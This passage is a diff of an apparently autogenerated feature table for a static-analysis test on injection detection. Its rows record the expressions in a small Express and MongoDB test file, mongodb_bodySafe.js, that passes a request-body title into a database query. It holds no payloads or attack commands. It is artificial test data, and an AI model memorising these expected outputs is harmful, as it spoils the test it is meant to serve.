autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | exceptional return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:29:20:1 | return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:30:11:32 | req | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:35:11:37 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:35:11:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:35:11:37 | res | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:35:11:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:11:35:11:37 | res | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:15 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query = {} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query = {} | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:11:12:20 | query = {} | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:19:12:20 | {} | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:19:12:20 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:19:12:20 | {} | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:19:12:20 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:12:19:12:20 | {} | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:9 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:9 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:9 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:9 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:9 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:15 | query.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:15 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:15 | query.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:15 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:15 | query.title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:32 | query.t ... y.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:32 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:32 | query.t ... y.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:32 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:5:13:32 | query.t ... y.title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:11:13:15 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:11:13:15 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:11:13:15 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:11:13:15 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:11:13:15 | title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:21 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:21 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:21 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:21 | req | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:26 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:26 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:26 | req.body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:26 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:26 | req.body | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:32 | req.body.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:32 | req.body.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:32 | req.body.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:32 | req.body.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:32 | req.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:19:13:32 | req.body.title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:23:13:26 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:23:13:26 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:23:13:26 | body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:23:13:26 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:23:13:26 | body | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:28:13:32 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:28:13:32 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:28:13:32 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:28:13:32 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:13:28:13:32 | title | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:15 | MongoClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:15 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:15 | MongoClient | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:15 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:15 | MongoClient | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:23 | MongoClient.connect | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:23 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:23 | MongoClient.connect | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:23 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:14:23 | MongoClient.connect | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | MongoCl ... \\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | MongoCl ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | MongoCl ... \\n }) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | exceptional return of MongoCl ... \\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | exceptional return of MongoCl ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:5:19:6 | exceptional return of MongoCl ... \\n }) | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:17:14:23 | connect | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:17:14:23 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:17:14:23 | connect | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:17:14:23 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:17:14:23 | connect | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:25:14:56 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:25:14:56 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:25:14:56 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -2054,6 +11078,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:25:14:56 | 'mongod ... 7/test' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:25:14:56 | 'mongod ... 7/test' | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:25:14:56 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:14:58 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:14:58 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:14:58 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:14:58 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:14:58 | query | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | 'arguments' object of anonymous function | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | (err, d ... ;\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | (err, d ... ;\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | (err, d ... ;\\n } | calleeImports | mongodb | @@ -2063,6 +11097,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | (err, d ... ;\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | (err, d ... ;\\n } | fileImports | body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | (err, d ... ;\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | exceptional return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | return of anonymous function | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:59:19:5 | return of anonymous function | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:60:14:62 | err | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:60:14:62 | err | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:60:14:62 | err | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:60:14:62 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:60:14:62 | err | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:14:65:14:66 | db | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:13 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:13 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:13 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:13 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:13 | doc | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc = d ... ('doc') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc = d ... ('doc') | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc = d ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:11:15:36 | doc = d ... ('doc') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:18 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:18 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:18 | db | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:18 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:18 | db | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:29 | db.collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:29 | db.collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:29 | db.collection | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:29 | db.collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:29 | db.collection | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | db.collection('doc') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | db.collection('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | db.collection('doc') | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | db.collection('doc') | fileImports | body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | exceptional return of db.collection('doc') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:15:17:15:36 | exceptional return of db.collection('doc') | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find 